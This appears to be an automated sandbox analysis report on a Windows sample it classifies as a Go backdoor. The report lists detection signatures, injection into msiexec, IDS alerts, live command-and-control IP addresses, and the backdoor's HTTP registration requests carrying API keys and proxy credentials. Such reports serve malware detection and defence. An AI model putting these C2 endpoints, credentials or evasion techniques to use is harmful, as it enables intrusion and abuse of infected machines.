Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
iKhdG3bwZK.exe

Overview

General Information

Sample name:iKhdG3bwZK.exe
renamed because original name is a hash value
Original sample name:1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211.exe
Analysis ID:1562117
MD5:044037796cf2d13eadf0217833d52e65
SHA1:b2e117be2c836ad18d1edccdd440fe44587b1386
SHA256:1438fe084b1e9bb3574c99cc44a53e6e1bee6e76a20c9bf2bb62139a70ffa211
Tags:exeTRADETRUSTLLCuser-JAMESWT_MHT
Infos:

Detection

GO Backdoor
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GO Backdoor
AI detected suspicious sample
Connects to many ports of the same IP (likely port scanning)
Found Tor onion address
Found direct / indirect Syscall (likely to bypass EDR)
Found hidden mapped module (file has been removed from disk)
Maps a DLL or memory area into another process
Switches to a custom stack to bypass stack traces
Uses known network protocols on non-standard ports
Writes to foreign memory regions
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Found dropped PE file which has not been started or loaded
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE / OLE file has an invalid certificate
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Msiexec Initiated Connection
Uses 32bit PE files

Classification

  • System is w10x64
  • iKhdG3bwZK.exe (PID: 6576 cmdline: "C:\Users\user\Desktop\iKhdG3bwZK.exe" MD5: 044037796CF2D13EADF0217833D52E65)
    • more.com (PID: 6692 cmdline: C:\Windows\SysWOW64\more.com MD5: 03805AE7E8CBC07840108F5C80CF4973)
      • conhost.exe (PID: 6720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • msiexec.exe (PID: 6620 cmdline: C:\Windows\SysWOW64\msiexec.exe MD5: 9D09DC1EDA745A5F87553048E57620CF)
  • LogiAiPrompt.exe (PID: 2208 cmdline: "C:\Users\user\AppData\Roaming\docker\LogiAiPrompt.exe" MD5: 044037796CF2D13EADF0217833D52E65)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000007.00000002.2986200286.000000000E52E000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
    00000007.00000002.2986200286.000000000E544000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
      00000007.00000002.2986200286.000000000E540000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
        Process Memory Space: msiexec.exe PID: 6620JoeSecurity_GOBackdoorYara detected GO BackdoorJoe Security
          Source: Network ConnectionAuthor: frack113: Data: DestinationIp: 46.8.232.106, DestinationIsIpv6: false, DestinationPort: 30001, EventID: 3, Image: C:\Windows\SysWOW64\msiexec.exe, Initiated: true, ProcessId: 6620, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49745
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:32:51.454857+010028554781A Network Trojan was detected192.168.2.44974546.8.232.10630001TCP
          2024-11-25T08:32:53.161229+010028554781A Network Trojan was detected192.168.2.44974646.8.236.6130001TCP
          2024-11-25T08:32:54.707596+010028554781A Network Trojan was detected192.168.2.44974791.212.166.9130001TCP
          2024-11-25T08:32:56.462874+010028554781A Network Trojan was detected192.168.2.449749188.130.206.24330001TCP
          2024-11-25T08:32:58.717750+010028554781A Network Trojan was detected192.168.2.44975038.180.205.16430001TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:33:00.211852+010028555361A Network Trojan was detected192.168.2.449751109.172.88.3814206TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:33:28.896467+010028555371A Network Trojan was detected192.168.2.449751109.172.88.3814206TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:33:29.364597+010028555381A Network Trojan was detected109.172.88.3814206192.168.2.449751TCP
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-11-25T08:33:00.211444+010028555391A Network Trojan was detected109.172.88.3814206192.168.2.449751TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: C:\Users\user\AppData\Local\Temp\yrpfhpihdypxAvira: detection malicious, Label: TR/Crypt.XPACK.Gen
          Source: iKhdG3bwZK.exeReversingLabs: Detection: 33%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: iKhdG3bwZK.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
          Source: iKhdG3bwZK.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wntdll.pdbUGP source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: iKhdG3bwZK.exe, 00000000.00000002.1810667210.0000000004C04000.00000004.00000020.00020000.00000000.sdmp, iKhdG3bwZK.exe, 00000000.00000002.1814575304.0000000004F60000.00000004.00000800.00020000.00000000.sdmp, more.com, 00000001.00000002.2127160017.0000000004C48000.00000004.00000020.00020000.00000000.sdmp, more.com, 00000001.00000002.2127756326.00000000057B0000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2984685137.0000000005670000.00000004.00001000.00020000.00000000.sdmp, msiexec.exe, 00000007.00000002.2983556026.0000000004B04000.00000004.00000020.00020000.00000000.sdmp

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49749 -> 188.130.206.243:30001
          Source: Network trafficSuricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49745 -> 46.8.232.106:30001
          Source: Network trafficSuricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49750 -> 38.180.205.164:30001
          Source: Network trafficSuricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49746 -> 46.8.236.61:30001
          Source: Network trafficSuricata IDS: 2855539 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M2 : 109.172.88.38:14206 -> 192.168.2.4:49751
          Source: Network trafficSuricata IDS: 2855536 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M1 : 192.168.2.4:49751 -> 109.172.88.38:14206
          Source: Network trafficSuricata IDS: 2855537 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Client Request M2 : 192.168.2.4:49751 -> 109.172.88.38:14206
          Source: Network trafficSuricata IDS: 2855538 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor CnC Server Response M1 : 109.172.88.38:14206 -> 192.168.2.4:49751
          Source: Network trafficSuricata IDS: 2855478 - Severity 1 - ETPRO MALWARE Unknown Golang Backdoor Activity : 192.168.2.4:49747 -> 91.212.166.91:30001
          Source: global trafficTCP traffic: 109.172.88.38 ports 0,1,2,4,6,14206
          Source: more.com, 00000001.00000002.2128130638.0000000006290000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp
          Source: msiexec.exe, 00000007.00000002.2982667967.0000000002C78000.00000002.00000001.01000000.00000000.sdmpString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp
          Source: yrpfhpihdypx.1.drString found in binary or memory: GoneDATAPING&lt;&gt;1080openStat.com.bat.cmdnullbooljson'\''quit3125Atoiint8uintchanfunccallkind != ermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--AhomChamKawiLisuMiaoModiNewaThaiTotoDashasn1tag:MarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930false<nil>Errordefersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:***@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&amp;&#34;&#39;chdirLstatarray%s:%dyamuxlocalparsentohs1562578125int16int32int64uint8slicesse41sse42ssse3 (at ClassTypeAtls: Earlyutf-8%s*%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermSHA-1P-224P-256P-384P-521ECDSAupdatekilleduserIdconfigSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13StringFormat[]bytestringsysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: remotehangup Value390625uint16uint32uint64structchan<-<-chanrdtscppopcntcmd/go, val LengthTypeNSTypeMXheaderAnswerGetACPX25519%w%.0wAcceptServerArabicBrahmiCarianChakmaCommonCopticGothicHangulHatranHebrewKaithiKhojkiLepchaLycianLydianRejangSyriacTai_LeTangsaTangutTeluguThaanaWanchoYezidiHyphenSTREETTuesdayJanuaryOctoberMUI_StdMUI_Dltfloat32float64forcegccpuprofunknowngctraceIO waitrunningUNKNOWN:eventswindowswsarecvwsasendconnectopenbsdlookup UpgradeReferer flags= len=%d (conn) %v=%v,expiresrefererrefreshtrailerGODEBUGTrailer:method:schemeupgrade:statushttp://chunkedCreatedIM UsedCONNECTHEADERSconsolePATHEXTrefused\\.\UNCabortedCopySidWSARecvWSASendsignal Swapper19531259765625invaliduintptrChanDir Value>Convertos/execruntime::ffff:nil keyanswersTypeSOATypePTRTypeTXTTypeSRVTypeOPTTypeWKSTypeALLderivedInitialExpiresSubjectcharsetAvestanBengaliBrailleCypriotDeseretElbasanElymaicGranthaHanunooKannadaMakasarMandaicMarchenMultaniMyanmarOsmanyaSharadaShavianSiddhamSinhalaSogdianSoyomboTagalogTibetanTirhutaRadicalSHA-224SHA-256SHA-384SHA-512#internDES-CBCEd25519MD2-RSAMD5-RSAserial:2.5.4.62.5.4.32.5.4.72.5.4.82.5.4.92.5.4.5scavengepollDescrwmutexWrwmutexRtraceBufdeadlockraceFinipanicnilcgocheck is not pointerBAD RANKruntime.reflect.net/httpgo/buildx509sha1profBlockstackpoolhchanLeafwbufSpansmSpanDeadscavtraceinittracepanicwaitchan sendpreemptedinterfacectxt != 0atomicor8tracebackcomplex64pclmulqdqmath/randrwxrwxrwxtime.Date(time.LocalnotifyListprofInsertstackLargemSpanInUseGOMAXPROCSstop tracedisablethpinvalidptrschedtracesemacquiredebug callGOMEMLIMITexitThreadBad varintatomicand8float64nanfloat32nanunknown pccomplex128execerrdothttp2debugcrypto/tlsassistQueuenetpollInitreflectOffsglobalAllocmSpanManualstart traceclobberfreegccheckmarkscheddetailcgocall nilunreachablebad m valuebad timedivfloat64nan1float64nan2float64nan3float32nan2gocachehashgocachetesthttp
          Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49745
          Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49746
          Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49747
          Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49749
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 30001
          Source: unknownNetwork traffic detected: HTTP traffic on port 30001 -> 49750
          Source: global trafficTCP traffic: 192.168.2.4:49745 -> 46.8.232.106:30001
          Source: global trafficTCP traffic: 192.168.2.4:49746 -> 46.8.236.61:30001
          Source: global trafficTCP traffic: 192.168.2.4:49747 -> 91.212.166.91:30001
          Source: global trafficTCP traffic: 192.168.2.4:49749 -> 188.130.206.243:30001
          Source: global trafficTCP traffic: 192.168.2.4:49750 -> 38.180.205.164:30001
          Source: global trafficTCP traffic: 192.168.2.4:49751 -> 109.172.88.38:14206
          Source: Joe Sandbox ViewIP Address: 46.8.232.106 46.8.232.106
          Source: Joe Sandbox ViewIP Address: 188.130.206.243 188.130.206.243
          Source: Joe Sandbox ViewIP Address: 91.212.166.91 91.212.166.91
          Source: Joe Sandbox ViewASN Name: FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics
          Source: Joe Sandbox ViewASN Name: SVINT-ASNES SVINT-ASNES
          Source: Joe Sandbox ViewASN Name: MOBILY-ASEtihadEtisalatCompanyMobilySA MOBILY-ASEtihadEtisalatCompanyMobilySA
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
          Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
          Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
          Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
          Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
          Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
          Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
          Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
          Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
          Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
          Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
          Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
          Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
          Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
          Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 188.130.206.243
          Source: unknownTCP traffic detected without corresponding DNS query: 91.212.166.91
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.236.61
          Source: unknownTCP traffic detected without corresponding DNS query: 46.8.232.106
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 38.180.205.164
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: unknownTCP traffic detected without corresponding DNS query: 109.172.88.38
          Source: global trafficHTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 46.8.232.106:30001User-Agent: Go-http-client/1.1X-Api-Key: PXbyn4MOAccept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 46.8.236.61:30001User-Agent: Go-http-client/1.1X-Api-Key: OJZULM0YAccept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 91.212.166.91:30001User-Agent: Go-http-client/1.1X-Api-Key: MeQHYhigAccept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 188.130.206.243:30001User-Agent: Go-http-client/1.1X-Api-Key: sNxZLFOrAccept-Encoding: gzip
          Source: global trafficHTTP traffic detected: GET /api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13eadf0217833d52e65&proxyPassword=2kXPzHVW&proxyUsername=6R0WzU7T&userId=IzhXMyKsSA8bmnLPaD5erUdWtcou HTTP/1.1Host: 38.180.205.164:30001User-Agent: Go-http-client/1.1X-Api-Key: jE9jRK0iAccept-Encoding: gzip
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243:30001
          Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243:30001/api/helper-first-register
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243:30001/api/helper-first-register?
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://188.130.206.243:30001sNxZLFOrHTTP/1.1
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001
          Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001/api/helper-first-register
          Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001/api/helper-first-register2024/11/25
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001/api/helper-first-register?
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRST
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E5B4000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13e
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E582000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://38.180.205.164:30001jE9jRK0iMon
          Source: msiexec.exe, 00000007.00000002.2985258925.000000000E464000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001
          Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register
          Source: msiexec.exe, 00000007.00000002.2985258925.000000000E40E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?
          Source: msiexec.exe, 00000007.00000002.2985258925.000000000E40E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUV
          Source: msiexec.exe, 00000007.00000002.2985258925.000000000E44E000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001/api/helper-first-register?buildVersion=0Z5V.TE82Oth&md5=044037796cf2d13ead
          Source: msiexec.exe, 00000007.00000002.2985258925.000000000E464000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.232.106:30001PXbyn4MOREQUEST_METHOD
          Source: msiexec.exe, 00000007.00000002.2986200286.000000000E52A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:30001/api/helper-first-register
          Source: msiexec.exe, 00000007.00000002.2986413586.000000000E59A000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://46.8.236.61:30001/api/helper-first-register?
